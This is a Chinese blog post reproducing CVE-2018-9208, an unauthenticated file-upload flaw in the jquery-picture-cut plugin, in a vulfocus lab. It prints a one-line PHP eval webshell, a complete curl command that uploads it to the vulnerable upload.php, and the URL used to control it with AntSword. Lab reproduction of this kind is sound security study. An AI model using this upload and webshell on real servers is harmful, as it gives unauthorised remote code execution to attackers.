jquery-picture-cut 任意文件上传 (CVE-2018-9208)

最新推荐文章于 2024-07-11 14:07:27 发布
最新推荐文章于 2024-07-11 14:07:27 发布
阅读量287 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: jquery 前端 javascript 网络安全 安全威胁分析 安全性测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134075006
版权

jquery-picture-cut 任意文件上传 (CVE-2018-9208)

漏洞描述

picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。

复现环境

vulfocus

漏洞复现

准备一句话木马文件 1.php

<?php @eval($_REQUEST["cmd"]);?>

curl 上传一句话木马

curl  -F  "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@1.php" http://10.9.47.6:10954/jquery-picture-cut/src/php/upload.php

image-20231027140547452

蚁剑连接

http://10.9.47.6:10954/1.php
gjl_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
jquery文件例子(两种方式)
04-17
NULL 博文链接:https://lihong11.iteye.com/blog/1832454
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
jquery-picture-cut 任意文件CVE-2018-9208)
ak.Gh0st的博客
10-31 787
picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件到服务器,从而允许执行代码。
jquery-picture-cut 任意文件(CVE-2018-9208)
m0_65150886的博客
01-02 458
​ picture cut是一个jquery插件,以友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件到服务器,从而允许执行代码。2.准备一句话木马文件 1.php。
jquery 图片上
hugejihu9的专栏
11-13 257
文章来自:源码在线https://www.shengli.me/jquery/218.html   代码:    
jQuery实现文件
凉茶铺的博客
01-03 5085
介绍了如何使用jQuery实现文件
jQuery文件
二狗的博客
12-13 1306
jQuery是一个JavaScript框架,我们可以直接在他的根目录下上我们的木马文件jQuery Upload File
jQuery文件漏洞(CVE-2018-9207)
m0_49025459的博客
12-06 787
漏洞描述 jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Upload File
weblogic10.36 CVE-2018-2893补丁文件
08-02
weblogic10.36 CVE-2018-2893补丁文件 最新补丁文件,修复 WebLogic(CVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
20款最好的jQuery文件插件
weixin_33953249的博客
03-24 1391
当它是关于开发网络应用程序和网页的时候,文件功能的重要性是不容忽视的。一个文件功能可以让你上所有类型的文件在网站上,包括视频,图像,文件和更多。创建一个文件功能,对你的网站是不是很难,有一点点的理解和一些代码,你可以自己做的。 然而,它不再只是简单地将图像上到托管服务器上。有一个额外的功能,这些都需要这些天。例如,当用户正在上载文件时,他可能会立即看到文件信息,包括预览。等特色种...
jquery 文件CVE-2018-9207)漏洞复现
weixin_42675091的博客
09-03 2584
jquery 文件CVE-2018-9207)漏洞复现
jquery 上文件_jQuery框架漏洞全总结及开发建议
weixin_39778106的博客
11-29 745
一、jQuery简介jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。据一项调查报告,在对433,000个网站的分析中发现,77%的网站至少使用了...
Jquery文件-代码实现
zhuxufeifei的博客
09-10 903
//前台预览代码 html代码部分 &amp;lt;label&amp;gt;头像:&amp;lt;/label&amp;gt; &amp;lt;img src=&quot;images/timg.jpg&quot; alt=&quot;&quot; id=&quot;headerImg&quot;&amp;gt; &amp;lt;input type=&quot;fi
CVE-2018-9207 jQuery文件漏洞复现
LM01的博客
06-04 1495
CVE-2018-9207 jQuery文件漏洞复现
Weblogic任意文件漏洞复现(CVE-2018-2894)
又菜又爱倒腾的博客
10-29 1218
#Weblogic任意文件漏洞(CVE-2018-2894)# 一、漏洞简介 Weblogic管理端未授权的两个页面存在任意jsp文件漏洞,进而获取服务器权限。 两个页面分别为/ws_utc/begin.do、/ws_utc/config.do。 Oracle 在2018年7月更新中,修复了Weblogic Web Service Test Page中一处任意文件漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制。 二、漏洞影响 影响版本编号
前端技术学习记录-基础知识(二)JavaScript基本语法
最新发布
adanjeep的博客
07-11 194
/ 声明一个String类型的变量name name = "Alice";// 初始化变量name int age;// 声明一个int类型的变量age age = 25;// 初始化变量age。静态强类型:Java语言,在申明变量时,需要明确定于变量的类型。对明确申明的变量,需要做强制转换,才会发生变化,否则不变。//数字 a = "hahaha";//字符串 </script>动态弱类型语言:变量可以存放在不同类型的值(动态)=== 比较相等(不会进行隐式类型转换)>>> 无符号右移(逻辑右移)
wordpress任意文件(cve-2019-15866)
09-04
然而,在2019年的漏洞披露中发现了一个名为CVE-2019-15866的重要漏洞,该漏洞使得攻击者可以进行任意文件。 该漏洞的利用方式是通过特制的恶意请求,将恶意文件到WordPress网站的服务器上。攻击者可以上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值